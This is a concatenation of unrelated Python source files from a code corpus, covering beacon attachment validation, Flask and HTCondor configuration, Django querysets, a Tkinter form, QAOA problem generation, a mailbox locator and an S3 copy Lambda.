IDEAL_TITLE_DESC_MAX = 40
HARD_TITLE_DESC_MAX = 50
def main():
    """Validate a Nearby Notifications attachment and attach it to a beacon.

    Parses CLI arguments, checks the target beacon is registered with the
    current project, validates the attachment JSON (required/recommended
    fields and title+description length limits), then uploads it via the
    Proximity Beacon API client.
    """
    parser = argparse.ArgumentParser(description=
        'Creates and adds an attachment to a beacon and verifies it to be a valid Nearby Notifications attachment')
    parser.add_argument('creds',
        help='Path to JSON file containing service account credentials authorized to call the Google Proximity Beacon API')
    parser.add_argument('beacon_name',
        help='Name of the beacon to attach to. Format is "beacons/N!<beacon ID>"')
    parser.add_argument('attachment',
        help='Path to the JSON file of the attachment to add (data only)')
    args = parser.parse_args()

    pb_client = pbapi.build_client_from_json(args.creds)

    # The beacon must already be registered before anything can be attached.
    print('Checking that "{}" is registered with current project'
        .format(args.beacon_name))
    registered = {b['beaconName'] for b in pb_client.list_beacons()}
    if args.beacon_name not in registered:
        print('Beacon name {} not registered yet. Please register it first.'
            .format(args.beacon_name))
        exit(1)

    print('Reading attachment from "{}" and verifying fields'
        .format(args.attachment))
    with open(args.attachment, 'r') as data_file:
        attachment = json.load(data_file)

    # Missing required fields are fatal; missing recommended ones only warn.
    print('Checking attachment for required fields.')
    missing_required = [f for f in REQUIRED_FIELDS if f not in attachment]
    for field in missing_required:
        print('[ERROR] Nearby requires "{}" field in attachment json, but was not found.'
            .format(field))
    if missing_required:
        exit(1)

    print('Checking attachment for recommended fields.')
    for field in RECOMMENDED_FIELDS:
        if field not in attachment:
            print('[WARN] "{}" is recommended to have in a Nearby attachment, but was not found.'
                .format(field))

    # Nearby truncates long notifications, so enforce the length budget.
    print('Checking title + description length')
    title_desc_len = sum(
        len(attachment[key]) for key in ('title', 'description')
        if key in attachment)
    if title_desc_len > HARD_TITLE_DESC_MAX:
        print('[ERROR] Title + Description length surpassed hard max of {}. Values given: "{} - {}" (length: {})'
            .format(HARD_TITLE_DESC_MAX, attachment['title'], attachment['description'], title_desc_len))
        exit(1)
    if title_desc_len > IDEAL_TITLE_DESC_MAX:
        print('[WARN] Title + Description length greater than soft max of {}. Values given: "{} - {}" (length: {})'
            .format(IDEAL_TITLE_DESC_MAX, attachment['title'], attachment['description'], title_desc_len))

    # Add attachment to beacon
    print('Adding attachment to "' + args.beacon_name + '"')
    pb_client.add_attachment(args.beacon_name, NEARBY_NS_TYPE, json.dumps(attachment))


if __name__ == "__main__":
    main()
| StarcoderdataPython |
9641979 | #-------------------------------------------------------------------------------
# Name: settings.py
# Purpose:
#
# Author: <NAME>. - <EMAIL>
#
# Created: 08/07/2021
# Copyright: (c) <NAME>. 2021 [ACAI Engineering ia]
# Licence: MIT
#-------------------------------------------------------------------------------
class BaseConfig():
    """Shared defaults for all environment-specific Flask configs."""
    # URL prefix under which the API blueprints are mounted.
    API_PREFIX = '/api'
    # Safe defaults: testing and debug are opt-in per environment.
    TESTING = False
    DEBUG = False
class DevConfig(BaseConfig):
    """Configuration for local development."""
    FLASK_ENV = 'development'
    DEBUG = True
    # NOTE(review): credentials are hard-coded here and identical to the
    # production config -- presumably placeholders; confirm they are
    # overridden via environment/secrets in real deployments.
    SQLALCHEMY_DATABASE_URI = 'postgresql://db_user:db_password@db-postgres:5432/flask-deploy'
    CELERY_BROKER = 'pyamqp://rabbit_user:rabbit_password@broker-rabbitmq//'
    CELERY_RESULT_BACKEND = 'rpc://rabbit_user:rabbit_password@broker-rabbitmq//'
class ProductionConfig(BaseConfig):
    """Configuration for production deployments."""
    FLASK_ENV = 'production'
    # Fix: DEBUG was True, which exposes the interactive debugger and
    # stack traces in production. Flask's docs state debug mode must
    # never be enabled on production machines.
    DEBUG = False
    # NOTE(review): credentials are hard-coded and identical to the dev
    # config -- presumably placeholders; they should come from the
    # environment or a secrets store in a real deployment.
    SQLALCHEMY_DATABASE_URI = 'postgresql://db_user:db_password@db-postgres:5432/flask-deploy'
    CELERY_BROKER = 'pyamqp://rabbit_user:rabbit_password@broker-rabbitmq//'
    CELERY_RESULT_BACKEND = 'rpc://rabbit_user:rabbit_password@broker-rabbitmq//'
class TestConfig(BaseConfig):
    """Configuration used by the automated test suite."""
    FLASK_ENV = 'development'
    TESTING = True
    DEBUG = True
    # make celery execute tasks synchronously in the same process
    CELERY_ALWAYS_EAGER = True
| StarcoderdataPython |
1912984 | from .symbol_table import SymbolTable
from ..visitor import symbols
class Visitor:
    """Driver object shared by the compiler, interpreter, and transpiler
    back ends.

    Holds the symbol table, collected output headers, and bookkeeping
    counters (nesting depth, break depth) used while walking the AST.
    """

    # Maps a visitor type to the verb stem used in diagnostics/vocabulary.
    vocab_bases = {
        "Compiler": "Compil",
        "Interpreter": "Interpret",
        "Transpiler": "Transpil"
    }

    def __init__(self, visitor_type, output_stream):
        self.type = visitor_type
        self.output_stream = output_stream
        self.headers = set()
        self.symbol_table = SymbolTable()
        # Only the interpreter evaluates symbols eagerly.
        self.symbol_table.interpret = visitor_type == "Interpreter"
        self.add_global_vars()
        self.depth = 0
        self.break_depth = 0

    def add_global_vars(self):
        """Seed the symbol table with the built-in constants."""
        for name, value in (("null", 0), ("true", 1), ("false", 0)):
            self.symbol_table[name] = symbols.Constant(name, value)

    def traverse(self, root):
        """Visit the tree rooted at *root*, then emit headers followed by
        the generated result, one line each."""
        result = root.visit(self)
        for header in self.headers:
            self.output_stream.write(f"{header}\n")
        self.output_stream.write(f"{result}\n")

    @classmethod
    def get_vocab_base(cls, visitor_type):
        """Return the verb stem for *visitor_type* (e.g. 'Compiler' -> 'Compil')."""
        return cls.vocab_bases[visitor_type]
| StarcoderdataPython |
from Tkinter import *

# Minimal Tkinter (Python 2) login-form demo: two labelled entry fields
# laid out with the grid geometry manager, plus a "keep me logged in"
# checkbox spanning both columns. No callbacks are wired up.
root = Tk()
label_1 = Label(root, text = "Name: ")
label_2 = Label(root, text = "Password:")
entry_1 = Entry(root)
entry_2 = Entry(root)
# sticky=E right-aligns the labels against their entry fields.
label_1.grid(row = 0, sticky = E)
label_2.grid(row = 1, sticky = E)
entry_1.grid(row = 0, column = 1)
entry_2.grid(row = 1, column = 1)
c = Checkbutton(root, text = "Keep me logged in")
c.grid(columnspan = 2)
# Blocks until the window is closed.
root.mainloop()
| StarcoderdataPython |
9630835 | <gh_stars>10-100
from django.db.models import Count, Q
from vocgui.models import Discipline
from vocgui.utils import get_child_count
from django.core.exceptions import PermissionDenied
from vocgui.utils import get_key
from vocgui.models import GroupAPIKey
def get_filtered_discipline_queryset(discipline_view_set):
    """Return the released, non-empty child disciplines of the discipline id
    carried by the passed view set.

    Each returned child is annotated with ``total_training_sets``, the count
    of its released training sets.

    :param discipline_view_set: A handle to the :class:`DisciplineViewSet`
    :type discipline_view_set: class

    :return: (filtered) queryset
    :rtype: QuerySet
    """
    parent = Discipline.objects.get(
        id=discipline_view_set.kwargs["discipline_id"]
    )
    children = Discipline.objects.filter(
        Q(released=True) & Q(id__in=parent.get_children())
    )
    annotated = children.annotate(
        total_training_sets=Count(
            "training_sets", filter=Q(training_sets__released=True)
        ),
    )
    return get_non_empty_disciplines(annotated)
def get_overview_discipline_queryset():
    """Return the released root disciplines created by super users that
    recursively contain at least one sub-discipline or training set.

    Each result is annotated with ``total_training_sets``, the count of its
    released training sets.

    :return: (filtered) queryset
    :rtype: QuerySet
    """
    released_admin = Discipline.objects.filter(
        Q(released=True) & Q(creator_is_admin=True)
    ).annotate(
        total_training_sets=Count(
            "training_sets", filter=Q(training_sets__released=True)
        ),
    )
    # Keep only tree roots, then drop disciplines with no content at all.
    roots = [obj for obj in released_admin if obj.is_root_node()]
    return get_non_empty_disciplines(roots)
def get_discipline_by_group_queryset(discipline_view_set):
    """Return the released root disciplines created by the group whose id is
    in the view set's keyword arguments, restricted to disciplines that
    (recursively) contain at least one training set.

    Each result is annotated with ``total_training_sets``, the count of its
    released training sets.

    :param discipline_view_set: A handle to the :class:`DisciplineViewSet`
    :type discipline_view_set: class

    :return: (filtered) queryset
    :rtype: QuerySet
    """
    group_id = discipline_view_set.kwargs["group_id"]
    candidates = Discipline.objects.filter(
        Q(released=True)
        & Q(created_by=group_id)
        & Q(id__in=get_valid_discipline_ids())
    ).annotate(
        total_training_sets=Count(
            "training_sets", filter=Q(training_sets__released=True)
        ),
    )
    return [obj for obj in candidates if obj.is_root_node()]
def get_non_empty_disciplines(queryset):
    """Keep only disciplines that recursively have at least one
    sub-discipline or one released training set.

    :param queryset: Queryset of `vocgui.Discipline` objects
    :type queryset: QuerySet

    :return: (filtered) queryset
    :rtype: QuerySet
    """
    kept = []
    for obj in queryset:
        # Cheap structural check first; only count training sets when the
        # discipline has no children (mirrors the original short-circuit).
        if get_child_count(obj) > 0:
            kept.append(obj)
        elif obj.training_sets.filter(released=True).count() > 0:
            kept.append(obj)
    return kept
def get_valid_discipline_ids():
    """Return the ids of all valid disciplines.

    A discipline is valid when it, or one of its children, contains at
    least one released training set.

    :return: list of ids of valid disciplines
    :rtype: list[int]
    """
    valid_ids = []
    for obj in Discipline.objects.all():
        has_children = get_child_count(obj) > 0
        if has_children or obj.training_sets.filter(released=True).count() > 0:
            valid_ids.append(obj.id)
    return valid_ids
def check_group_object_permissions(request, group_id):
    """Verify that the request's API key belongs to the given group.

    :param request: current request
    :type request: HttpRequest
    :param group_id: group id
    :type group_id: int

    :raises PermissionDenied: if no API key is delivered
    :raises PermissionDenied: if the key doesn't belong to the passed group id
    """
    api_key = get_key(request)
    if not api_key:
        raise PermissionDenied()
    key_object = GroupAPIKey.objects.get_from_key(api_key)
    if int(key_object.organization_id) != int(group_id):
        raise PermissionDenied()
| StarcoderdataPython |
1946461 | <reponame>DistrictDataLabs/logbook
# catalog.forms
# Forms and other HTML data handling from the web front end.
#
# Author: <NAME> <<EMAIL>>
# Created: Wed Oct 28 15:47:44 2015 -0400
#
# Copyright (C) 2015 District Data Labs
# For license information, see LICENSE.txt
#
# ID: forms.py [] <EMAIL> $
"""
Forms and other HTML data handling from the web front end.
"""
##########################################################################
## Imports
##########################################################################
import requests
from django import forms
from bs4 import BeautifulSoup
from urlparse import urlparse
from datetime import datetime
from django.conf import settings
from autoslug.settings import slugify
from catalog.parser import slugify as username_slugify
from django.contrib.auth.models import User
from catalog.models import Publication
from catalog.parser import ActivityParser
from members.models import Membership, Role
##########################################################################
## Module Constants
##########################################################################
# strptime/strftime pattern for publication dates as rendered on the blog,
# e.g. "October 28, 2015".
PUBDATE_FORMAT = "%B %d, %Y"

# Error messages for the dataset upload form's file field, keyed by the
# Django FileField error code they override.
DATASET_ERROR_MSGS = {
    "required": "Please select an activity dataset to upload.",
    "invalid": "The activity dataset you provided is invalid, please select another.",
    "missing": "The activity dataset you specified is missing, please select another.",
    "empty": "The uploaded activity dataset is empty, cannot upload.",
    "max_length": "The activity dataset is too big, please submit a smaller CSV.",
}
##########################################################################
## Upload Form
##########################################################################
class DatasetUploadForm(forms.Form):
    """
    Post an activity dataset and add the activity to the logbook.
    """

    dataset = forms.FileField(required=True, error_messages=DATASET_ERROR_MSGS)

    def __init__(self, *args, **kwargs):
        # Pop the request before delegating so the base Form never sees
        # the unexpected keyword argument.
        self.request = kwargs.pop('request', None)
        super(DatasetUploadForm, self).__init__(*args, **kwargs)

    def save(self):
        """
        Parse the uploaded dataset and return the parser's activity counts.
        """
        parser = ActivityParser()
        dataset = self.cleaned_data['dataset']

        # Execute the parsing. Close the upload handle even if parsing
        # raises (the original leaked it on parse errors).
        dataset.open('rb')
        try:
            counts = parser.parse(dataset)
        finally:
            dataset.close()

        return counts
class LinkFetchForm(forms.Form):
    """
    Submit a URL to lookup the publication.
    """

    link = forms.URLField(required=True)

    def clean_link(self):
        """
        Validate a link such that its domain is in the list of valid
        publication domains and that we haven't already added the link to the
        database (because then there is nothing we can do).
        """
        data = self.cleaned_data['link']
        urlp = urlparse(data)

        # Test to ensure is in the valid domains
        if urlp.netloc not in settings.PUBLICATION_DOMAINS:
            raise forms.ValidationError(
                "Domain {!r} is not a valid publication domain. "
                "Only DDL publications can be fetched."
                .format(urlp.netloc,)
            )

        # If the link is in the DB - don't do any work.
        if Publication.objects.filter(link=data).exists():
            raise forms.ValidationError(
                "This link has already been added to the database!"
            )

        return data

    def get_author(self, name):
        """
        Attempts to retrieve an author by the full name from the database.

        Builds a username as first initial + last name ("Jane Doe" ->
        "jdoe"); single-word names are used as-is, then slugified.
        """
        parts = name.split()
        uname = parts[0][0] + parts[-1] if len(parts) > 1 else parts[0]
        uname = username_slugify(uname)
        # NOTE(review): raises User.DoesNotExist when no match -- save()
        # appears to rely on this propagating to "error early"; confirm.
        return User.objects.get(username=uname)

    def fetch(self):
        """
        Fetches the blog post, parses it and returns a dictionary of relevant
        values and information. Use this method sparingly.

        Performs a live HTTP GET and scrapes title, author names, and the
        publication date (parsed with PUBDATE_FORMAT) from the page.
        """
        link = self.cleaned_data['link']
        resp = requests.get(link)
        soup = BeautifulSoup(resp.content, "html5lib")

        return {
            "title": soup.find(class_='kaia_header_title').text.strip(),
            "authors": soup.find(class_="name_link").text.strip().split(" and "),
            "pubdate": datetime.strptime(soup.find(class_="entry_date").text.strip(), PUBDATE_FORMAT).date(),
            "link": link,
        }

    def save(self):
        """
        Parses and saves the publication to the database.

        Returns the (publication, created) pair from update_or_create.
        """
        kwargs = self.fetch()

        # Fetch authors first to error early if we can't find the user(s).
        authors = [
            self.get_author(name) for name in kwargs.pop('authors', [])
        ]

        # Get publication by slug or create it with the discovered attributes
        pub, crt = Publication.objects.update_or_create(slug=slugify(kwargs['title']), defaults=kwargs)

        # Add authors to the publication if any
        for author in authors:
            # Make sure the author has the correct role
            _ = Membership.objects.get_or_create(
                role=Role.objects.get(slug="blog-author"), profile=author.profile
            )
            # Add author to the publication
            if author not in pub.authors.all():
                pub.authors.add(author)

        return pub, crt
| StarcoderdataPython |
9668659 | <gh_stars>0
#!/usr/bin/env python
# Python 2 one-liner demo: draw nine random ints in [1, 99] and print
# only the odd ones (n % 2 is truthy exactly for odd values).
from random import randint as ri
print [n for n in [ri(1, 99) for i in range(9)] if n%2]
| StarcoderdataPython |
6538222 | from typing import Union
from lxml.etree import _Element
from utils.parse import parse_int
from utils.xmlutils import find_value
class Status:
    """OFX <STATUS> aggregate: a numeric code plus a severity string."""

    code: Union[int, None]
    status_type: Union[str, None]

    def __init__(self, code: int = None, status_type: str = None):
        """
        Args:
            code (int): status code
            status_type (str): severity of the status (INFO, WARN, or ERROR)
        """
        self.code = code
        self.status_type = status_type

    def __str__(self) -> str:
        """Render as "SEVERITY (code)", whichever part is present, or ""."""
        # Use identity tests against None (PEP 8); the original used
        # "!= None", which invokes __ne__ and is the non-idiomatic form.
        if self.status_type is not None and self.code is not None:
            return '%s (%d)' % (self.status_type, self.code)
        if self.status_type is not None:
            return self.status_type
        if self.code is not None:
            return str(self.code)
        return ''

    @classmethod
    def parse_ofx(cls, status_el: _Element = None):
        """Build a Status from a parsed <STATUS> element.

        Returns None when no element is given.
        """
        if status_el is not None:
            return Status(
                code=find_value(status_el, 'CODE', parse_int),
                status_type=find_value(status_el, 'SEVERITY')
            )
        return None
| StarcoderdataPython |
5020640 | # coding: utf-8
"""
HTCondor workflow implementation. See https://research.cs.wisc.edu/htcondor.
"""
__all__ = ["HTCondorWorkflow"]
import os
import logging
from abc import abstractmethod
from collections import OrderedDict
import luigi
from law.workflow.remote import BaseRemoteWorkflow, BaseRemoteWorkflowProxy
from law.job.base import JobArguments
from law.task.proxy import ProxyCommand
from law.target.file import get_path
from law.target.local import LocalDirectoryTarget
from law.parameter import NO_STR
from law.util import law_src_path, merge_dicts, DotDict
from law.contrib.htcondor.job import HTCondorJobManager, HTCondorJobFileFactory
logger = logging.getLogger(__name__)
class HTCondorWorkflowProxy(BaseRemoteWorkflowProxy):
    """Remote-workflow proxy that submits branch jobs to HTCondor.

    Job-manager/job-file-factory creation is delegated to the owning task
    so users can customize them via the HTCondorWorkflow hooks.
    """

    workflow_type = "htcondor"

    def create_job_manager(self, **kwargs):
        """Create the HTCondor job manager via the task hook."""
        return self.task.htcondor_create_job_manager(**kwargs)

    def create_job_file_factory(self, **kwargs):
        """Create the HTCondor job file factory via the task hook."""
        return self.task.htcondor_create_job_file_factory(**kwargs)

    def create_job_file(self, job_num, branches):
        """Build the submission file for one job running *branches*.

        Returns a dict with the job file path under "job" and the absolute
        custom log file path (or None) under "log".
        """
        task = self.task
        config = self.job_file_factory.Config()

        # the file postfix is pythonic range made from branches, e.g. [0, 1, 2, 4] -> "_0To5"
        postfix = "_{}To{}".format(branches[0], branches[-1] + 1)
        config.postfix = postfix
        # helper that marks a file name for postfix substitution in render data
        pf = lambda s: "__law_job_postfix__:{}".format(s)

        # get the actual wrapper file that will be executed by the remote job
        wrapper_file = get_path(task.htcondor_wrapper_file())
        config.executable = os.path.basename(wrapper_file)

        # collect task parameters
        proxy_cmd = ProxyCommand(task.as_branch(branches[0]), exclude_task_args={"branch"},
            exclude_global_args=["workers", "local-scheduler"])
        if task.htcondor_use_local_scheduler():
            proxy_cmd.add_arg("--local-scheduler", "True", overwrite=True)
        for key, value in OrderedDict(task.htcondor_cmdline_args()).items():
            proxy_cmd.add_arg(key, value, overwrite=True)

        # job script arguments
        job_args = JobArguments(
            task_cls=task.__class__,
            task_params=proxy_cmd.build(skip_run=True),
            branches=branches,
            auto_retry=False,
            dashboard_data=self.dashboard.remote_hook_data(
                job_num, self.submission_data.attempts.get(job_num, 0)),
        )
        config.arguments = job_args.join()

        # prepare render variables
        config.render_variables = {}

        # input files
        config.input_files = [wrapper_file, law_src_path("job", "job.sh")]
        config.render_variables["job_file"] = pf("job.sh")

        # add the bootstrap file
        bootstrap_file = task.htcondor_bootstrap_file()
        if bootstrap_file:
            config.input_files.append(bootstrap_file)
            config.render_variables["bootstrap_file"] = pf(os.path.basename(bootstrap_file))

        # add the stageout file
        stageout_file = task.htcondor_stageout_file()
        if stageout_file:
            config.input_files.append(stageout_file)
            config.render_variables["stageout_file"] = pf(os.path.basename(stageout_file))

        # does the dashboard have a hook file?
        dashboard_file = self.dashboard.remote_hook_file()
        if dashboard_file:
            config.input_files.append(dashboard_file)
            config.render_variables["dashboard_file"] = pf(os.path.basename(dashboard_file))

        # output files
        config.output_files = []

        # custom content
        config.custom_content = []

        # logging
        # we do not use condor's logging mechanism since it requires that the submission directory
        # is present when it retrieves logs, and therefore we rely on the job.sh script
        config.log = None
        config.stdout = None
        config.stderr = None
        if task.transfer_logs:
            log_file = "stdall.txt"
            config.custom_log_file = log_file
            config.render_variables["log_file"] = pf(log_file)

        # we can use condor's file stageout only when the output directory is local
        # otherwise, one should use the stageout_file and stageout manually
        output_dir = task.htcondor_output_directory()
        if isinstance(output_dir, LocalDirectoryTarget):
            config.absolute_paths = True
            config.custom_content.append(("initialdir", output_dir.path))
        else:
            del config.output_files[:]

        # task hook
        config = task.htcondor_job_config(config, job_num, branches)

        # determine basenames of input files and add that list to the render data
        input_basenames = [pf(os.path.basename(path)) for path in config.input_files[1:]]
        config.render_variables["input_files"] = " ".join(input_basenames)

        # build the job file and get the sanitized config
        job_file, config = self.job_file_factory(**config.__dict__)

        # determine the absolute custom log file if set
        abs_log_file = None
        if config.custom_log_file and isinstance(output_dir, LocalDirectoryTarget):
            abs_log_file = output_dir.child(config.custom_log_file, type="f").path

        # return job and log files
        return {"job": job_file, "log": abs_log_file}

    def destination_info(self):
        """Return a short, human-readable destination description
        (pool / scheduler) for log messages."""
        info = []
        if self.task.htcondor_pool != NO_STR:
            info.append(", pool: {}".format(self.task.htcondor_pool))
        if self.task.htcondor_scheduler != NO_STR:
            info.append(", scheduler: {}".format(self.task.htcondor_scheduler))
        # Each fragment already carries its own ", " prefix, so join with the
        # empty string; the original ", ".join(info) doubled the separator
        # (", pool: x, , scheduler: y") when both values were set.
        return "".join(info)
class HTCondorWorkflow(BaseRemoteWorkflow):
    """Workflow mixin whose branches are submitted to an HTCondor pool.

    Subclasses must implement htcondor_output_directory(); the other
    htcondor_* hooks have sensible defaults and can be overridden to
    customize submission (bootstrap/stageout files, job config, etc.).
    """

    workflow_proxy_cls = HTCondorWorkflowProxy

    # optional decorators applied around the remote run method
    htcondor_workflow_run_decorators = None
    # default kwargs for the job manager / job file factory hooks
    htcondor_job_manager_defaults = None
    htcondor_job_file_factory_defaults = None

    htcondor_pool = luigi.Parameter(default=NO_STR, significant=False, description="target "
        "htcondor pool; default: empty")
    htcondor_scheduler = luigi.Parameter(default=NO_STR, significant=False, description="target "
        "htcondor scheduler; default: empty")

    # names of parameters forwarded as kwargs to job manager calls
    htcondor_job_kwargs = ["htcondor_pool", "htcondor_scheduler"]
    htcondor_job_kwargs_submit = None
    htcondor_job_kwargs_cancel = None
    htcondor_job_kwargs_query = None

    exclude_params_branch = {"htcondor_pool", "htcondor_scheduler"}

    exclude_index = True

    @abstractmethod
    def htcondor_output_directory(self):
        """Return the directory target where job outputs/logs are stored."""
        return None

    def htcondor_workflow_requires(self):
        """Extra requirements of the workflow itself; none by default."""
        return DotDict()

    def htcondor_bootstrap_file(self):
        """Optional file sourced on the worker before the job runs."""
        return None

    def htcondor_wrapper_file(self):
        """Shell wrapper executed by HTCondor on the worker node."""
        return law_src_path("job", "bash_wrapper.sh")

    def htcondor_stageout_file(self):
        """Optional file sourced on the worker after the job ran."""
        return None

    def htcondor_output_postfix(self):
        """Postfix appended to output names, derived from the branch range."""
        return "_" + self.get_branches_repr()

    def htcondor_create_job_manager(self, **kwargs):
        """Instantiate the job manager, merging class defaults with kwargs."""
        kwargs = merge_dicts(self.htcondor_job_manager_defaults, kwargs)
        return HTCondorJobManager(**kwargs)

    def htcondor_create_job_file_factory(self, **kwargs):
        # job file fectory config priority: kwargs > class defaults
        kwargs = merge_dicts({}, self.htcondor_job_file_factory_defaults, kwargs)
        return HTCondorJobFileFactory(**kwargs)

    def htcondor_job_config(self, config, job_num, branches):
        """Hook to amend the per-job submission config; identity by default."""
        return config

    def htcondor_use_local_scheduler(self):
        """When True, remote jobs run with luigi's local scheduler."""
        return False

    def htcondor_cmdline_args(self):
        """Extra command line arguments forwarded to the remote task."""
        return {}
| StarcoderdataPython |
1993062 | <filename>recirq/qaoa/experiments/run-problem-generation.py
# Copyright 2020 Google
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from recirq.qaoa.experiments.problem_generation_tasks import SKProblemGenerationTask, \
HardwareGridProblemGenerationTask, ThreeRegularProblemGenerationTask, \
generate_3_regular_problem, generate_sk_problem, generate_hardware_grid_problem
def main():
    """Generate every QAOA problem instance for the 2020-03-19 dataset:
    hardware-grid, Sherrington-Kirkpatrick, and 3-regular problems."""
    dataset_id = '2020-03-19'

    # 100 instances per size; grid problems on Sycamore23 for 2..23 qubits.
    hardware_grid_problem_tasks = [
        HardwareGridProblemGenerationTask(
            dataset_id=dataset_id,
            device_name='Sycamore23',
            instance_i=i,
            n_qubits=n,
        )
        for i in range(100)
        for n in range(2, 23 + 1)
    ]

    # SK problems for 3..17 qubits.
    sk_problem_tasks = [
        SKProblemGenerationTask(
            dataset_id=dataset_id,
            instance_i=i,
            n_qubits=n,
        )
        for i in range(100)
        for n in range(3, 17 + 1)
    ]

    # 3-regular graphs only exist when 3*n is even (i.e. n even here).
    three_regular_problem_tasks = [
        ThreeRegularProblemGenerationTask(
            dataset_id=dataset_id,
            instance_i=i,
            n_qubits=n,
        )
        for i in range(100)
        for n in range(3, 23 + 1) if 3 * n % 2 == 0
    ]

    # Run each family with its generator, preserving the original order.
    jobs = (
        (hardware_grid_problem_tasks, generate_hardware_grid_problem),
        (sk_problem_tasks, generate_sk_problem),
        (three_regular_problem_tasks, generate_3_regular_problem),
    )
    for tasks, generate in jobs:
        for task in tasks:
            generate(task)
# Standard script entry point: only run main() when executed directly.
if __name__ == '__main__':
    main()
| StarcoderdataPython |
45752 | from math import radians, cos, sqrt
from dbi import select_from_zip, select_from_id, create_connection
from api import *
import usaddress
def distance(lat1, lon1, lat2, lon2):
    """Approximate ground distance in meters between two lat/lon points.

    Uses the equirectangular approximation: longitudes are scaled by the
    cosine of the mean latitude, then scaled by Earth's radius (6371000 m).
    Inputs are in degrees.
    """
    mean_lat = (lat1 + lat2) / 2
    dx = radians(lon1 - lon2) * cos(radians(mean_lat))
    dy = radians(lat1 - lat2)
    return 6371000 * sqrt((dx * dx) + (dy * dy))
class Closest_boxes(object):
    """Find the mailboxes nearest to a street address.

    Combines a geocoding API lookup, address parsing (usaddress), and a
    local SQLite database of mailbox locations.
    """

    def __init__(self, address, key):
        # address: free-form street address; key: geocoding API key
        self.address = address
        self.key = key

    def geoencode(self):
        """Geocode self.address and return [latitude, longitude]."""
        geo = geoencoding(self.address, self.key)
        g = geo["results"][0]["geometry"]
        location = g["location"]
        lat1 = location["lat"]
        lon1 = location["lng"]
        return [lat1, lon1]

    def parse_address(self):
        """Tag the address with usaddress.

        NOTE(review): returns the usaddress (tagged, type) tuple on success
        but a plain error *string* on RepeatedLabelError -- callers that
        index the result (see mailbox_loc) will misbehave on the error path.
        """
        try:
            ret = usaddress.tag(self.address)
        except usaddress.RepeatedLabelError:
            ret = "Please enter a valid address."
        return ret

    def mailbox_loc(self):
        """Return mailbox rows from the database for the address's ZIP code."""
        conn = create_connection("fulldata.sqlite")
        # [0] is the tagged-components dict; if parse_address returned the
        # error string this grabs its first character instead -- see note.
        parsed = self.parse_address()[0]
        zipcode = parsed["ZipCode"]
        return select_from_zip(conn, zipcode)

    def closest_boxes(self):
        """Return DB rows for (roughly) the three closest mailboxes.

        Tracks three running distances (low <= med <= high) and the box ids
        (hi, mi, li) that produced them.

        NOTE(review): the first iteration seeds all three distances from the
        first box but never records that box's id, so hi/mi/li can remain 0
        until later boxes displace them -- looks like a bug; confirm.
        NOTE(review): "dist > med <= high" chains as
        (dist > med) and (med <= high); presumably "med < dist <= high"
        was intended.
        """
        high, med, low = -1, -1, -1
        hi, mi, li = 0, 0, 0
        selfaddr = self.geoencode()
        boxes = self.mailbox_loc()
        for box in boxes:
            # rows store latitude/longitude in their last two columns
            lat = box[-2]
            lon = box[-1]
            dist = distance(float(lat), float(lon), float(selfaddr[0]), float(selfaddr[1]))
            if high == -1 or med == -1 or low == -1:
                high, med, low = dist, dist, dist
            elif dist <= low:
                high, med, low, hi, mi, li = med, low, dist, mi, li, box[0]
            elif low < dist <= med:
                high, med, hi, mi = med, dist, mi, box[0]
            elif dist > med <= high:
                high, hi = dist, box[0]
            else:
                pass
        conn = create_connection("fulldata.sqlite")
        r0 = select_from_id(conn, hi)
        r1 = select_from_id(conn, mi)
        r2 = select_from_id(conn, li)
        ret = [r0, r1, r2]
        return ret

    def create_address(self):
        """Format the closest boxes as {"addr, city, state, zip": (lat, lon)}.

        Reverses the list so results run closest-first.
        """
        box_locs = self.closest_boxes()
        print(box_locs)
        if len(box_locs) == 0:
            return {"No boxes found": ""}
        else:
            box_locs.reverse()
            ret = {}
            for box in box_locs:
                if len(box) == 0:
                    ret["No close boxes found. Please visit https://mailboxlocate.com/ to find your nearest mailbox"] = ""
                    continue
                box_ = box[0]
                addr = box_[1]
                city = box_[2]
                state = box_[3]
                zipcode = box_[4]
                full = "{}, {}, {}, {}".format(addr, city, state, zipcode)
                ret[full] = (box_[-2], box_[-1])
            return ret
| StarcoderdataPython |
302078 | """
-*- coding: utf-8 -*-
========================
AWS Lambda
========================
Contributor: <NAME> (<NAME>)
========================
"""
import boto3
from pprint import pprint
def lambda_handler(event, context):
    """AWS Lambda entry point: copy every object from the source bucket to
    the destination bucket, appending "_new" to each key.

    NOTE(review): bucket names look like placeholders ("sbucket-name",
    "dbucket-name") -- confirm before deploying.
    """
    s3 = boto3.resource("s3")
    source_bucket = s3.Bucket("sbucket-name")
    destination_bucket = s3.Bucket("dbucket-name")
    for obj in source_bucket.objects.all():
        # new key = original key + "_new" suffix
        destination_bucket_file_rename = obj.key + str("_new")
        s3.Object(destination_bucket.name, destination_bucket_file_rename).copy_from(CopySource= { 'Bucket': obj.bucket_name , 'Key' : obj.key})
    return 'Thanks'
| StarcoderdataPython |
12822441 | <reponame>dperl-sol/cctbx_project
from __future__ import absolute_import, division, print_function
from scitbx import math
from scitbx.array_family import flex
from six.moves import range
def tst(N=3):
    """Smoke test for scitbx.math.multivariate_moments.

    Streams 100k N-component samples, each component uniform on
    [0.9, 1.1], then checks the accumulated mean (~1), variance
    (~(0.2)^2/12, the uniform-distribution variance), and that the packed
    variance-covariance entries are small relative to 0.0033.
    """
    weights = flex.double(N)*0.0+1.0
    mvo = math.multivariate_moments( weights )
    for ii in range(100000):
        # 1 + 0.1*(1 - 2*U) with U ~ U[0,1): uniform on [0.9, 1.1]
        tmp = 0.1*(1.0-2.0*flex.random_double(N))+flex.double(range(N))*0.0+1.0
        mvo.update(tmp)
    vcv = mvo.vcv_upper_triangle_packed()
    mean = mvo.mean()
    var = mvo.variance()
    for m in mean:
        assert abs(m-1.0)<1e-3
    for v in var:
        # Var(U[a,b]) = (b-a)^2 / 12
        assert abs(v-0.2*0.2/12)<1e-4
    for c in vcv:
        # NOTE(review): assumes the packed vcv holds only (near-zero)
        # covariances; a diagonal variance entry (~0.0033) would fail this
        # check -- confirm what vcv_upper_triangle_packed returns.
        assert abs(c/0.0033)<1e-3
# Run the self-test when executed directly; print OK if all asserts pass.
if __name__ == "__main__":
    tst()
    print("OK")
| StarcoderdataPython |
